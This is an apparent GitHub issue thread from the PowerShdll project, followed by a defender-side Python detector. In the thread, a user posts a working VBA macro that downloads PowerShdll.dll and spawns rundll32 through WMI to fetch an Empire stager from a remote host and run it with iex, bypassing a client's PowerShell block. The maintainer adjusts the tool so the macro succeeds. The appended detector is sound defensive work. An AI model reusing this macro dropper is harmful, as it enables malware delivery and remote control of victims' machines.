Execute PowerShdll from VBA macro
vivami opened this issue · 4 comments
First of all: thanks for this awesome project!
I'm trying to execute PowerShdll via a VBA macro (client blocks powershell.exe, and I want an Empire agent), by first downloading the dll (DownloadDLL()) and then executing the downloaded PowerShdll.dll by letting it download a script to execute (Empire stager). This works when I execute StrCmd in a cmd.exe, but does not work when executing it via the following VBA script:
Public Function Debugging() As Variant
DownloadDLL
Dim StrCmd As String
StrCmd = "C:\Windows\System32\rundll32.exe C:\Temp\PowerShdll.dll,main . { iwr -useb https://cl.ly/kgIa/stager.ps1 } ^| iex;"
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create StrCmd, Null, objConfig, intProcessID
End Function
Sub DownloadDLL()
Dim myURL As String
myURL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", myURL, False
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
oStream.SaveToFile "C:\Temp\PowerShdll.dll", 2
oStream.Close
End If
End Sub
This results in the following error message:
Problem signature:
Problem Event Name: CLR20r3
Problem Signature 01: rundll32.exe
Problem Signature 02: 6.3.9600.17415
Problem Signature 03: 54504eb8
Problem Signature 04: mscorlib
Problem Signature 05: 4.0.30319.36366
Problem Signature 06: 57a0f7f9
Problem Signature 07: 4528
Problem Signature 08: 9a
Problem Signature 09: System.IO.IOException
OS Version: 6.3.9600.2.0.0.272.7
Locale ID: 1033
Additional Information 1: 6ebd
Additional Information 2: 6ebd833e076778d4646eaf22a3f76243
Additional Information 3: e34d
Additional Information 4: e34d4e50642e55705797b1cdfa61a4c5
Any clue as to how I can fix this? Thanks in advance!
I think I understand the problem. I used a trick to show the command output inside the current shell.
Basically, it steals the calling process' console and writes to it. In this context there is no shell so it will not work.
I will add an option to not show output.
I added the -n switch to not redirect output. Should be ok now.
Please confirm.
Thanks! It works now, also without the -n switch.
I moved the console hijacking bit after the script execution, so I assume it would crash after the command has been executed.
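A defender-side companion to the thread above, added here and not part of the PowerShdll project or of any comment in this issue: a small detector run over constructed Sysmon-style process-creation records that flags the pattern the original post describes (rundll32.exe loading a DLL from a user-writable path, spawned through WMI Win32_Process.Create so that the parent is WmiPrvSE.exe, with a download-and-evaluate command line). The record field names, the trusted-directory list and the sample events are assumptions made for this example.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# Event 0 mirrors the command line from the original post, with a placeholder host.
EVENTS = [
    {"image": "C:\\Windows\\System32\\rundll32.exe",
     "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "cmdline": "C:\\Windows\\System32\\rundll32.exe C:\\Temp\\PowerShdll.dll,main . "
                "{ iwr -useb https://example.invalid/stager.ps1 } | iex;"},
    {"image": "C:\\Windows\\System32\\rundll32.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
    {"image": "C:\\Windows\\System32\\rundll32.exe",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "rundll32.exe C:\\Users\\u\\AppData\\Local\\Temp\\x.dll,main"},
]

# rundll32 syntax is "<dll>,<entrypoint> [args]"; capture the DLL path and entry name.
RUNDLL32_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+\.dll)"?\s*,\s*(\w+)', re.I)
# Assumed allow-list: DLLs rundll32 legitimately loads live under these directories.
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# WMI-spawned children have WmiPrvSE.exe as parent; Office parents indicate a macro.
SUSPICIOUS_PARENTS = ("wmiprvse.exe", "winword.exe", "excel.exe", "powerpnt.exe")
PS_TOKENS = re.compile(r"\b(iex|iwr|invoke-expression|invoke-webrequest|downloadstring)\b", re.I)


def analyze(event):
    """Return the reasons a record looks like PowerShdll-style rundll32 abuse (empty = benign)."""
    reasons = []
    if not event["image"].lower().endswith("rundll32.exe"):
        return reasons
    m = RUNDLL32_RE.search(event["cmdline"])
    if m and not m.group(1).lower().startswith(TRUSTED_DLL_DIRS):
        reasons.append(f"DLL outside trusted system directories: {m.group(1)}")
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent} (WMI or Office parent)")
    if PS_TOKENS.search(event["cmdline"]):
        reasons.append("PowerShell download/evaluate tokens in rundll32 command line")
    return reasons


def scan(events):
    """Return (index, reasons) for every record that triggers at least one rule."""
    hits = [(i, analyze(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in hits if r]


if __name__ == "__main__":
    for idx, reasons in scan(EVENTS):
        print(idx, "->", "; ".join(reasons))
```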